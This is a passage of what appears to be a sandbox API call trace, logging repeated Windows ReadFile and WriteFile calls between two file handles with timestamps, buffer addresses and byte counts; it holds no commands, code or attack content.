lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.457] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.460] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.461] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x388, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.462] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.464] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.466] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.467] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.468] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.469] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.470] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.470] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x369, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.473] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.476] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.477] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.479] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.481] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.484] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.485] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.486] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.488] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.489] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.491] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.492] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.493] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.494] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.495] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.496] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.498] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.499] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.500] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.502] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.503] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, 